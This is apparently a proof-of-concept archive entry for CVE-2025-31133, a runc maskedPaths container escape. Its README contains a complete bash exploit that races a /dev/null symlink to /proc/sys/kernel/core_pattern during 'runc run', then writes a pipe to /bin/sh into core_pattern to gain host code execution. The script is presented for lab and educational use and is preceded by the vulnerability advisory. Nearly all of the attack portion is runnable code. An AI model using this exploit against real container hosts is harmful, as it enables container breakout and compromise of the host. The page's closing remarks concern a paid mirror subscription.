Associated Vulnerability
Title: runc container escape via "masked path" abuse due to mount race conditions (CVE-2025-31133)
Description: runc is a CLI tool for spawning and running containers according to the OCI specification. In versions 1.2.7 and below, 1.3.0-rc.1 through 1.3.1, 1.4.0-rc.1 and 1.4.0-rc.2, runc would not perform sufficient verification that the source of the bind-mount (i.e., the container's /dev/null) was actually a real /dev/null inode when using the container's /dev/null to mask paths. This exposes two methods of attack: an arbitrary mount gadget, leading to host information disclosure, host denial of service, container escape, or a bypass of maskedPaths. This issue is fixed in versions 1.2.8, 1.3.3 and 1.4.0-rc.3.
Readme
## CVE-2025-31133 runc maskedPaths Exploit PoC
> **WARNING:**
> This PoC attempts host code execution via runc maskedPaths race.
> For educational and authorized lab use only.
```bash
#!/bin/bash
# CVE-2025-31133 runc maskedPaths symlink race exploit
# This PoC performs a real breakout: writes core_pattern to invoke /bin/sh on the host.
# WARNING: This WILL attempt host code execution. Use only in isolated, disposable labs you fully control.
set -euo pipefail
RUNC_BIN="/usr/local/bin/runc"
CONTAINER_ROOTFS="./rootfs"
CONTAINER_NAME="cve31133poc"
echo "[*] runc version: $($RUNC_BIN --version | head -1)"
echo "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."
# Fresh rootfs with static /dev
rm -rf "$CONTAINER_ROOTFS"
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
cp /bin/busybox "$CONTAINER_ROOTFS/bin/sh"
chmod +x "$CONTAINER_ROOTFS/bin/sh"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
cat > config.json <<EOF
{
"ociVersion": "1.0.2",
"process": {
"terminal": false,
"user": { "uid": 0, "gid": 0 },
"args": ["/bin/sh", "-c", "sleep 30"],
"env": ["PATH=/bin"],
"cwd": "/"
},
"root": { "path": "rootfs", "readonly": false },
"mounts": [
{ "destination": "/proc", "type": "proc", "source": "proc" },
{ "destination": "/dev", "type": "bind", "source": "dev", "options": ["rbind", "rw"] },
{ "destination": "/sys", "type": "sysfs", "source": "sysfs" }
],
"linux": {
"namespaces": [
{ "type": "pid" },
{ "type": "network" },
{ "type": "mount" },
{ "type": "ipc" },
{ "type": "uts" }
],
"maskedPaths": [
"/proc/kcore",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/sched_debug",
"/sys/firmware",
"/proc/sys/kernel/core_pattern"
]
}
}
EOF
echo "[*] config.json created (explicit maskedPaths)."
# Start the symlink race BEFORE and DURING runc run
symlink_race() {
local end=$((SECONDS+20))
while [ $SECONDS -lt $end ]; do
rm -f "$CONTAINER_ROOTFS/dev/null"
ln -s /proc/sys/kernel/core_pattern "$CONTAINER_ROOTFS/dev/null"
sleep 0.01 2>/dev/null || sleep 1
rm -f "$CONTAINER_ROOTFS/dev/null"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
sleep 0.01 2>/dev/null || sleep 1
done
}
echo "[*] Starting symlink race background process."
symlink_race &
RACE_PID=$!
# Start container while race is active
echo "[*] Launching runc run..."
$RUNC_BIN run --detach --bundle . "$CONTAINER_NAME"
sleep 2
echo "[*] Writing to /proc/sys/kernel/core_pattern in container (real exploit)."
$RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c 'echo "|/bin/sh -i" > /proc/sys/kernel/core_pattern; kill -ABRT $$'
wait $RACE_PID || true
$RUNC_BIN kill "$CONTAINER_NAME" || true
$RUNC_BIN delete "$CONTAINER_NAME" || true
echo "[+] Exploit attempt complete. If successful, you should now have code exec on the host via core_pattern!"
```
File Snapshot
[4.0K] /data/pocs/1b1f165959d96e5263509c79a12713c0f824af9e
└── [2.8K] README.md
1 directory, 1 file
Remarks
1. It is advised to access the PoC via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support.